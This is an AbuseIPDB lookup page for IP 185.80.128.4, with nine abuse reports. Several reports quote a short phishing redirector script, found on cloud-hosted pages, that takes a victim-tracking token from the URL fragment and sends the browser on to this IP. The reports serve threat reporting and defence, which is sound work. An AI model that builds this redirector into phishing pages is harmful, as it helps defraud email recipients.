JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 185.80.128.4

185.80.128.4 was found in our database!

This IP was reported 9 times. Confidence of Abuse is 0%: ?

ISP	UAB ESNET
Usage Type	Data Center/Web Hosting/Transit
ASN	AS61053
Domain Name	esnet.lt
Country	🇱🇹 Lithuania
City	Vilnius, Vilnius

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 185.80.128.4

Whois 185.80.128.4

IP Abuse Reports for 185.80.128.4:

This IP address has been reported a total of 9 times from 3 distinct sources. 185.80.128.4 was first reported on November 23rd 2022, and the most recent report was 11 months ago.

Old Reports: The most recent abuse report for this IP address is from 11 months ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇧🇪 Anon	2025-06-12 05:56:00 (11 months ago)	Malicious, see https://www.spamrats.com/bl?185.80.128.4	Phishing Email Spam
🇧🇪 Anon	2025-05-28 16:25:00 (1 year ago)	https://storage.googleapis.com/25kdhsale/NWBH25.html Content: <script> var tarcking_param = w ... show more https://storage.googleapis.com/25kdhsale/NWBH25.html Content: <script> var tarcking_param = window.location.href.split('#')[1]; var srv_ip = "185.80.128.4"; if(!tarcking_param){ alert("please set tracking params!"); }else{ document.location.href = 'http://'+srv_ip+'/?'+tarcking_param; } </script> Reloads to malicious IP 185.80.128.4 See https://www.virustotal.com/gui/ip-address/185.80.128.4 https://urlscan.io/search/#185.80.128.4 show less	Phishing Email Spam
🇧🇪 P D	2025-04-12 09:41:00 (1 year ago)	https://storage.googleapis.com/25kdhsale/NWBH25.html Content: <script> var tarcking_param = w ... show more https://storage.googleapis.com/25kdhsale/NWBH25.html Content: <script> var tarcking_param = window.location.href.split('#')[1]; var srv_ip = "185.80.128.4"; if(!tarcking_param){ alert("please set tracking params!"); }else{ document.location.href = 'http://'+srv_ip+'/?'+tarcking_param; } </script> Reloads to malicious IP 185.80.128.4 https://www.virustotal.com/gui/ip-address/185.80.128.4 https://urlscan.io/search/#185.80.128.4 show less	Phishing Email Spam
🇧🇪 P D	2024-12-15 13:20:00 (1 year ago)	https://storage.googleapis.com/bhsales25/bhsales4wd.html Content: <script> var tarcking_param = ... show more https://storage.googleapis.com/bhsales25/bhsales4wd.html Content: <script> var tarcking_param = window.location.href.split('#')[1]; var srv_ip = "185.80.128.4"; if(!tarcking_param){ alert("please set tracking params!"); }else{ document.location.href = 'http://'+srv_ip+'/?'+tarcking_param; } </script> Script reloads to IP 185.80.128.4 and the string after # is used to track the victim and to redirect the victims to the phishing domain like intotechworld.com (malicious, see https://www.virustotal.com/gui/domain/intotechworld.com) Malicious, see https://www.virustotal.com/gui/ip-address/185.80.128.4/detection https://urlscan.io/search/#185.80.128.4 show less	Phishing Email Spam
🇧🇪 P D	2024-12-06 11:55:00 (1 year ago)	https://storage.googleapis.com/bhsales25/bhsales4wd.html Content: <script> var tarcking_param = ... show more https://storage.googleapis.com/bhsales25/bhsales4wd.html Content: <script> var tarcking_param = window.location.href.split('#')[1]; var srv_ip = "185.80.128.4"; if(!tarcking_param){ alert("please set tracking params!"); }else{ document.location.href = 'http://'+srv_ip+'/?'+tarcking_param; } </script> Script reloads to IP 185.80.128.4 and the string after # is used to track the victim and to redirect the victims to the phishing domain like intotechworld.com (malicious, see https://www.virustotal.com/gui/domain/intotechworld.com) Malicious, see https://www.virustotal.com/gui/ip-address/185.80.128.4/detection https://urlscan.io/search/#185.80.128.4 show less	Phishing Email Spam
🇧🇪 P D	2024-11-27 05:38:00 (1 year ago)	https://storage.googleapis.com/bhsales25/bhsales4wd.html Content: <script> var tarcking_param = ... show more https://storage.googleapis.com/bhsales25/bhsales4wd.html Content: <script> var tarcking_param = window.location.href.split('#')[1]; var srv_ip = "185.80.128.4"; if(!tarcking_param){ alert("please set tracking params!"); }else{ document.location.href = 'http://'+srv_ip+'/?'+tarcking_param; } </script> Script reloads to IP 185.80.128.4 and the string after # is used to track the victim and to redirect the victims to the phishing domain like intotechworld.com (malicious, see https://www.virustotal.com/gui/domain/intotechworld.com) Malicious, see https://www.virustotal.com/gui/ip-address/185.80.128.4/detection https://urlscan.io/search/#185.80.128.4 show less	Phishing Email Spam
🇧🇪 P D	2024-11-22 19:39:00 (1 year ago)	https://storage.googleapis.com/bhsales25/bhsales4wd.html Content: <script> var tarcking_param = ... show more https://storage.googleapis.com/bhsales25/bhsales4wd.html Content: <script> var tarcking_param = window.location.href.split('#')[1]; var srv_ip = "185.80.128.4"; if(!tarcking_param){ alert("please set tracking params!"); }else{ document.location.href = 'http://'+srv_ip+'/?'+tarcking_param; } </script> Script reloads to IP 185.80.128.4 and the string after # is used to track the victim and to redirect the victims to the phishing domain like intotechworld.com (malicious, see https://www.virustotal.com/gui/domain/intotechworld.com) Malicious, see https://www.virustotal.com/gui/ip-address/185.80.128.4/detection https://urlscan.io/search/#185.80.128.4 show less	Phishing Email Spam
🇧🇪 P D	2024-11-21 19:33:00 (1 year ago)	https://storage.googleapis.com/bhsales25/bhsales4wd.html Content: <script> var tarcking_param = ... show more https://storage.googleapis.com/bhsales25/bhsales4wd.html Content: <script> var tarcking_param = window.location.href.split('#')[1]; var srv_ip = "185.80.128.4"; if(!tarcking_param){ alert("please set tracking params!"); }else{ document.location.href = 'http://'+srv_ip+'/?'+tarcking_param; } </script> Script reloads to IP 185.80.128.4 and the string after # is used to track the victim and to redirect the victims to the phishing domain like intotechworld.com (malicious, see https://www.virustotal.com/gui/domain/intotechworld.com) Malicious, see https://www.virustotal.com/gui/ip-address/185.80.128.4/detection https://urlscan.io/search/#185.80.128.4 show less	Phishing Email Spam
🇪🇸 10dencehispahard SL	2022-11-23 13:25:25 (3 years ago)	Suspicious activity detected by Modsecurity [Suspicious IP found on 28 servers 34 times. Reincident ... show more Suspicious activity detected by Modsecurity [Suspicious IP found on 28 servers 34 times. Reincident by 0. Rules:] show less	Web App Attack

Showing 1 to 9 of 9 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 174.169.224.27

🇩🇪 8.209.90.19

🇨🇳 221.2.148.5

🇺🇸 192.241.141.178

🇨🇳 115.190.216.185

🇺🇸 85.208.98.198

🇺🇸 64.23.140.124

🇺🇸 161.35.124.147

🇺🇸 142.214.1.7

🇰🇷 106.247.141.104

🇳🇱 91.92.42.133

🇰🇷 43.108.33.252

🇪🇸 34.175.114.93

🇯🇵 8.211.146.160

🇺🇸 2607:f8b0:400e:c1e::121

🇪🇸 212.30.33.145

🇲🇽 189.162.3.203

🇺🇸 154.83.197.50

🇭🇰 150.5.131.119

🇭🇰 123.58.213.128